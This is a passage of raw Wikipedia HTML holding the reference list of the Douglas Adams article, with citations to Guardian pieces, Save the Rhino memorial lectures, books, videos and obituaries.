title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Interview%3A+Douglas+Adams&rft.aufirst=Dave&rft.aulast=Silverman&rft.date=1998%2F1999&rft.genre=article&rft_id=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams&rft.issue=1&rft.jtitle=American+Atheist&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&rft.volume=37\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-TheGuardian-35\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-TheGuardian_35-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">Bunce, Kim (5 November 2006). <a rel=\"nofollow\" class=\"external text\" href=\"http://books.guardian.co.uk/reviews/roundupstory/0,,1939704,00.html\">\"Observer, ''The God Delusion'', 5 November 2006\"</a>. <i><a href=\"/wiki/The_Guardian\" title=\"The Guardian\">The Guardian</a></i>. London<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">1 June</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Observer%2C+%27%26%2339%3BThe+God+Delusion%27%26%2339%3B%2C+5+November+2006&rft.aufirst=Kim&rft.aulast=Bunce&rft.date=2006-11-05&rft.genre=article&rft_id=http%3A%2F%2Fbooks.guardian.co.uk%2Freviews%2Froundupstory%2F0%2C%2C1939704%2C00.html&rft.jtitle=The+Guardian&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Dawkins2001-36\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Dawkins2001_36-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">Dawkins, Richard (13 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.guardian.co.uk/uk/2001/may/14/books.booksnews\">\"Lament for Douglas Adams\"</a>. <i>The Guardian</i><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">29 December</span> 2012</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Lament+for+Douglas+Adams&rft.aufirst=Richard&rft.aulast=Dawkins&rft.date=2001-05-13&rft.genre=article&rft_id=http%3A%2F%2Fwww.guardian.co.uk%2Fuk%2F2001%2Fmay%2F14%2Fbooks.booksnews&rft.jtitle=The+Guardian&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-37\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-37\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\"><a href=\"/wiki/Paola_Cavalieri\" title=\"Paola Cavalieri\">Cavalieri, Paola</a> and <a href=\"/wiki/Peter_Singer\" title=\"Peter Singer\">Peter Singer</a>, editors (1994). <i>The Great Ape Project: Equality Beyond Humanity</i> (U.S. Paperback ed.). St. Martin's Griffin. pp. 19–23. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-312-11818-X\" title=\"Special:BookSources/0-312-11818-X\">0-312-11818-X</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Cavalieri%2C+Paola+and+Peter+Singer%2C+editors&rft.btitle=The+Great+Ape+Project%3A+Equality+Beyond+Humanity&rft.date=1994&rft.edition=U.S.+Paperback&rft.genre=book&rft.isbn=0-312-11818-X&rft.pages=19-23&rft.pub=St.+Martin%27s+Griffin&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span> <span class=\"citation-comment\" style=\"display:none; color:#33aa33\">CS1 maint: Multiple names: authors list (<a href=\"/wiki/Category:CS1_maint:_Multiple_names:_authors_list\" title=\"Category:CS1 maint: Multiple names: authors list\">link</a>)</span></span></li>\n<li id=\"cite_note-38\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-38\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://lifednah2g2.blogspot.co.uk/2011/01/ninth-douglas-adams-memorial-lecture.html\">\"The Ninth Douglas Adams Memorial Lecture\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">27 July</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=The+Ninth+Douglas+Adams+Memorial+Lecture&rft.genre=unknown&rft_id=http%3A%2F%2Flifednah2g2.blogspot.co.uk%2F2011%2F01%2Fninth-douglas-adams-memorial-lecture.html&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-39\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-39\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/latest_news/news/287_douglas_adams_the_party\">\"Douglas Adams The Party\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+The+Party&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Flatest_news%2Fnews%2F287_douglas_adams_the_party&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-40\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-40\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/events/476_douglas_adams_memorial_lecture_2013\">\"Douglas Adams Memorial Lecture 2013\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">15 August</span> 2012</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2013&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Fevents%2F476_douglas_adams_memorial_lecture_2013&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-41\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-41\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/events/798_douglas_adams_memorial_lecture\">\"Douglas Adams Memorial Lecture 2014\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">15 November</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2014&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Fevents%2F798_douglas_adams_memorial_lecture&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-42\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-42\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/events/1059_douglas_adams_memorial_lecture_2015_-_sold_out\">\"Douglas Adams Memorial Lecture 2015\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">30 January</span> 2015</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2015&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Fevents%2F1059_douglas_adams_memorial_lecture_2015_-_sold_out&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-43\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-43\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://www.savetherhino.org/events/1383_douglas_adams_memorial_lecture_2016\">\"Douglas Adams Memorial Lecture 2016\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">7 December</span> 2015</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2016&rft.genre=unknown&rft_id=https%3A%2F%2Fwww.savetherhino.org%2Fevents%2F1383_douglas_adams_memorial_lecture_2016&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Simpson_184-185-44\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-Simpson_184-185_44-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-Simpson_184-185_44-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 184–185</span></li>\n<li id=\"cite_note-45\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-45\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas and <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> (1991). <i>Last Chance to See</i> (First U.S. Hardcover ed.). <a href=\"/wiki/Harmony_Books\" title=\"Harmony Books\">Harmony Books</a>. p. 59. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-517-58215-5\" title=\"Special:BookSources/0-517-58215-5\">0-517-58215-5</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas+and+Mark+Carwardine&rft.btitle=Last+Chance+to+See&rft.date=1991&rft.edition=First+U.S.+Hardcover&rft.genre=book&rft.isbn=0-517-58215-5&rft.pages=59&rft.pub=Harmony+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-46\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-46\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas (2002). <i>The Salmon of Doubt: Hitchhiking the Galaxy One Last Time</i> (First UK hardcover ed.). Macmillan. pp. 90–1. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-333-76657-1\" title=\"Special:BookSources/0-333-76657-1\">0-333-76657-1</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas&rft.btitle=The+Salmon+of+Doubt%3A+Hitchhiking+the+Galaxy+One+Last+Time&rft.date=2002&rft.edition=First+UK+hardcover&rft.genre=book&rft.isbn=0-333-76657-1&rft.pages=90-1&rft.pub=Macmillan&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-47\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-47\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=gx6WPQkhUXI\">\"Craig Ferguson 23 February, 2010B Late Late show Stephen Fry PT2\"</a>. YouTube. 21 June 2010<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">27 July</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Craig+Ferguson+23+February%2C+2010B+Late+Late+show+Stephen+Fry+PT2&rft.date=2010-06-21&rft.genre=unknown&rft_id=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dgx6WPQkhUXI&rft.pub=YouTube&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-48\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-48\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.douglasadams.com/cgi-bin/mboard/info/dnathread.cgi?2922,1\">\"Adams's final post on his forums at\"</a>. Douglasadams.com<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">1 June</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Adams%27s+final+post+on+his+forums+at&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.douglasadams.com%2Fcgi-bin%2Fmboard%2Finfo%2Fdnathread.cgi%3F2922%2C1&rft.pub=Douglasadams.com&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-49\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-49\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://groups.google.com/group/alt.fan.douglas-adams\">\"Discussions – alt.fan.douglas-adams | Google Groups\"</a>. Google<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Discussions+%93+alt.fan.douglas-adams+%26%23124%3B+Google+Groups&rft.genre=unknown&rft_id=https%3A%2F%2Fgroups.google.com%2Fgroup%2Falt.fan.douglas-adams&rft.pub=Google&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-50\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-50\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Adams, Douglas (15 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://channel9.msdn.com/Events/PDC/PDC-1996/PDC-1996-Keynote-with-Douglas-Adams\">\"PDC 1996 Keynote with Douglas Adams\"</a>. <i><a href=\"/w/index.php?title=Channel9.msdn.com&action=edit&redlink=1\" class=\"new\" title=\"Channel9.msdn.com (page does not exist)\">channel9.msdn.com</a></i>. Channel 9<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">22 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=PDC+1996+Keynote+with+Douglas+Adams&rft.aufirst=Douglas&rft.aulast=Adams&rft.date=2001-05-15&rft.genre=unknown&rft_id=http%3A%2F%2Fchannel9.msdn.com%2FEvents%2FPDC%2FPDC-1996%2FPDC-1996-Keynote-with-Douglas-Adams&rft.jtitle=channel9.msdn.com&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-51\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-51\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Cassel, David (15 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://archive.salon.com/tech/feature/2001/05/15/douglas_adams/index.html\">\"So long, Douglas Adams, and thanks for all the fun\"</a>. <i><a href=\"/wiki/Salon_(website)\" title=\"Salon (website)\">Salon</a></i>. Salon Media Group<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">10 July</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=So+long%2C+Douglas+Adams%2C+and+thanks+for+all+the+fun&rft.aufirst=David&rft.aulast=Cassel&rft.date=2001-05-15&rft.genre=unknown&rft_id=http%3A%2F%2Farchive.salon.com%2Ftech%2Ffeature%2F2001%2F05%2F15%2Fdouglas_adams%2Findex.html&rft.jtitle=Salon&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-IPP-52\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-IPP_52-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-IPP_52-1\"><sup><i><b>b</b></i></sup></a> <a href=\"#cite_ref-IPP_52-2\"><sup><i><b>c</b></i></sup></a></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://web.archive.org/web/20120318001614/http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp\">\"Islington People's Plaques\"</a>. 25 July 2011. Archived from <a rel=\"nofollow\" class=\"external text\" href=\"http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp\">the original</a> on 18 March 2012<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">13 August</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Islington+People%27s+Plaques&rft.date=2011-07-25&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.islington.gov.uk%2FLeisure%2Fheritage%2Fheritage_borough%2Fbor_plaques%2Fpeoplesplaques.asp&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-sfweekly-53\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-sfweekly_53-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Bowers, Keith (6 July 2011). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.sfweekly.com/2011-07-06/calendar/big-three/\">\"Big Three\"</a>. <i>SF Weekly</i>. <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mSWp8yr?url=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">8 December</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Big+Three&rft.aufirst=Keith&rft.aulast=Bowers&rft.date=2011-07-06&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F&rft.jtitle=SF+Weekly&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-54\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-54\">^</a></b></span> <span class=\"reference-text\">Webb, Chapter 10.</span></li>\n<li id=\"cite_note-timesobit-55\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-timesobit_55-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://announcements.thetimes.co.uk/obituaries/timesonline-uk/obituary.aspx?page=lifestory&pid=153521790\">\"Obituary & Guest Book Preview for Jane Elizabeth BELSON\"</a>. <i>The Times</i>. 9 September 2011. <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mSoMnJe\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">8 December</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Obituary+%26+Guest+Book+Preview+for+Jane+Elizabeth+BELSON&rft.date=2011-09-09&rft.genre=unknown&rft_id=http%3A%2F%2Fannouncements.thetimes.co.uk%2Fobituaries%2Ftimesonline-uk%2Fobituary.aspx%3Fpage%3Dlifestory%26pid%3D153521790&rft.jtitle=The+Times&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-h2g2obit-56\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-h2g2obit_56-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://lifednah2g2.blogspot.com/2011/09/jane-belson-douglas-adams-widow-passed.html\">\"Jane Belson, Douglas Adams's widow, passed away\"</a>. <i>h2g2</i><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">9 July</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Jane+Belson%2C+Douglas+Adams%27s+widow%2C+passed+away&rft.genre=unknown&rft_id=http%3A%2F%2Flifednah2g2.blogspot.com%2F2011%2F09%2Fjane-belson-douglas-adams-widow-passed.html&rft.jtitle=h2g2&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-57\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-57\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Lewis, Judith; Shulman, Dave (24 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.laweekly.com/2001-05-24/news/lots-of-screamingly-funny-sentences-no-fish/\">\"Lots of Screamingly Funny Sentences. No Fish. – page 1\"</a>. LA Weekly. <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mQ1aCJQ?url=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F\">Archived</a> from the original on 24 May 2001<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">20 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Judith&rft.aulast=Lewis&rft.au=Shulman%2C+Dave&rft.btitle=Lots+of+Screamingly+Funny+Sentences.+No+Fish.+%93+page+1&rft.date=2001-05-24&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F&rft.pub=LA+Weekly&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Simpson_337-338-58\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_337-338_58-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 337–338</span></li>\n<li id=\"cite_note-59\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-59\">^</a></b></span> <span class=\"reference-text\">Gaiman, 204.</span></li>\n<li id=\"cite_note-60\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-60\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.bbc.co.uk/cult/hitchhikers/celebration/\">\"BBC Online – Cult – Hitchhiker's – Douglas Adams – Service of Celebration\"</a>. BBC. 17 September 2001<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=BBC+Online+%93+Cult+%93+Hitchhiker%27s+%93+Douglas+Adams+%93+Service+of+Celebration&rft.date=2001-09-17&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.bbc.co.uk%2Fcult%2Fhitchhikers%2Fcelebration%2F&rft.pub=BBC&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-61\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-61\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=_ZG8HBuDjgc\">\"Parrots, the universe and everything, recorded May 2001\"</a>. YouTube<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Parrots%2C+the+universe+and+everything%2C+recorded+May+2001&rft.genre=unknown&rft_id=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D_ZG8HBuDjgc&rft.pub=YouTube&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-62\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-62\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://navarroj.com/parrots\">\"Transcript of \"Parrots, the Universe and Everything<span style=\"padding-right:0.2em;\">\"</span>\"</a>. Navarroj.com<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">27 July</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Transcript+of+%22Parrots%2C+the+Universe+and+Everything%22&rft.genre=unknown&rft_id=http%3A%2F%2Fnavarroj.com%2Fparrots&rft.pub=Navarroj.com&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-MPC42677-63\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-MPC42677_63-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.minorplanetcenter.net/iau/ECS/MPCArchive/2001/MPC_20010509.pdf\">\"New Names of Minor Planets\"</a> <span style=\"font-size:85%;\">(PDF)</span>, <i><a href=\"/wiki/Minor_Planet_Circular\" class=\"mw-redirect\" title=\"Minor Planet Circular\">Minor Planet Circular</a></i>, Cambridge, Mass: <a href=\"/wiki/Minor_Planet_Center\" title=\"Minor Planet Center\">Minor Planet Center</a> (MPC 42677), 9 May 2001, <a href=\"/wiki/International_Standard_Serial_Number\" title=\"International Standard Serial Number\">ISSN</a> <a rel=\"nofollow\" class=\"external text\" href=\"//www.worldcat.org/issn/0736-6884\">0736-6884</a></cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=New+Names+of+Minor+Planets&rft.date=2001-05-09&rft.genre=article&rft_id=http%3A%2F%2Fwww.minorplanetcenter.net%2Fiau%2FECS%2FMPCArchive%2F2001%2FMPC_20010509.pdf&rft.issn=0736-6884&rft.issue=MPC+42677&rft.jtitle=Minor+Planet+Circular&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-64\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-64\">^</a></b></span> <span class=\"reference-text\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.msnbc.msn.com/id/6867061/\">Asteroid named after 'Hitchhiker' humorist: Late British sci-fi author honored after cosmic campaign</a> by Alan Boyle, MSNBC, 25 January 2005</span></li>\n<li id=\"cite_note-65\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-65\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">Murray, Charles Shaar (10 May 2002). <a rel=\"nofollow\" class=\"external text\" 